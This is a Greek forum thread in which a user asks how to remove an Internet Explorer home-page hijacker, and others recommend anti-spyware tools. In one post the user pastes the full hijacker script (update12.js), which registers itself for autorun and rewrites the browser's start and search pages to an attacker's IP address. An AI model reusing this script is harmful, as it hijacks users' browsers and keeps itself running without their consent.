nikolaos_ Δημοσ. 11 Ιανουαρίου 2004 Δημοσ. 11 Ιανουαρίου 2004 Κάθε φορά που ανοίγω τον internet explorer μου βγάζει home page τη σελίδα http://81.211.105.9/index.php?v=3 χωρίς την δική μου άδεια. Από τα Tools/Internet Options δεν έχω κάποιο αποτέλεσμα. Ακόμη και όταν είμαι offline και έχω αλλάξει το Home Page με ξαναστέλνει (μάλιστα ζητά connect!) στην παραπάνω διεύθυνση. Άρα κάπου έχει "καθίσει" αυτή η σελίδα μέσα στο σκληρό μου δίσκο και αλλάζει τα internet options, αλλά δεν ξέρω πού. Μπορεί κάποιος να με βοηθήσει να την απομακρύνω?? Ευχαριστώ.
Marcos_Aurilius Δημοσ. 11 Ιανουαρίου 2004 Δημοσ. 11 Ιανουαρίου 2004 Λοιπόν, κατεβάζεις το Adaware και κάνεις ένα scan στον υπολογιστή σου. Θα βρει τον εισβολέα και θα σε βοηθήσει να τον απομακρύνεις...
nikolaos_ Δημοσ. 11 Ιανουαρίου 2004 Μέλος Δημοσ. 11 Ιανουαρίου 2004 Το adaware 6 που μόλις κατέβασα δεν βοήθησε. Βρήκε και έσβησε μερικά άλλα "objects" αλλά το πρόβλημα εξακολουθεί. Είχα βρει ένα .js αρχείο (c:\windows\update12.js) το οποίο περιέχει τα εξής var url = "http://81.211.105.9/index.php?v=2"; var burl = "http://81.211.105.9/index.php?v=2"; var fso = new ActiveXObject("Scripting.FileSystemObject"); var tfolder = fso.GetSpecialFolder(0); var filepath = tfolder + "\\update12.js"; var Shell = new ActiveXObject("WScript.Shell"); Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath); Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url); Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url); Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl); Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no"); Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD"); Αμέσως υποψιάστηκα ότι είναι το "ένοχο", και βέβαια μπήκα στη Resistry για να απομακρύνω ή να αλλάξω τα πειραγμένα keys που γράφει στο script. Το σκριπτάκι βέβαια το απομάκρυνα από το c:\windows Δεν είχε θετικό αποτέλεσμα. Συγκεκριμένα, * Ανοίγω IE --> με βγάζει στη δική μου αρχική σελίδα * Πατάω home page --> με στέλνει στην http://81.211.105.9/index.php?v=3 * Μπαίνω tools/internet options --> η αρχική σελίδα έχει αλλάξει. Η επόμενη κίνηση ήταν να κάνω ένα search για να βρω κάποιο αρχείο που να περιέχει μέσα το string "81.211" . Το μόνο αρχείο που περιέχει ένα τέτοιο string ήταν ένα c:\windows\system32\tksrv98.exe και δεν εντόπισα άλλα αρχεία με αυτό το string. Δεν ξέρω τι κάνει το tksrv98.exe και τι ρόλο έχει. Με hex workshop είδα ότι περιέχει την διεύθυνση http://81.211.105.10/index.php?num=2&qq= Δοκίμασα να το μετονομάσω σε tksrv98.exe.stop, αλλάζω registry, reboot, ανοίγω explorer, ΤΖΙΦΟΣ. Εχει κανείς κάτι να μου προτείνει? HELP!
random Δημοσ. 11 Ιανουαρίου 2004 Δημοσ. 11 Ιανουαρίου 2004 check this http://www.wilderssecurity.net/spywareguard.html http://www.wilderssecurity.net/bhblaster.html http://www.spywareinfo.com/articles/hijacked/ (άρθρο)
DownUNDERground Δημοσ. 11 Ιανουαρίου 2004 Δημοσ. 11 Ιανουαρίου 2004 Προφανώς κάποιον ιό έχεις.Κατέβασε και τρέξε τα: CoolWebShredder και Spybot - Search & Destroy και νομίζω ότι θα λυθεί το πρόβλημα.
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.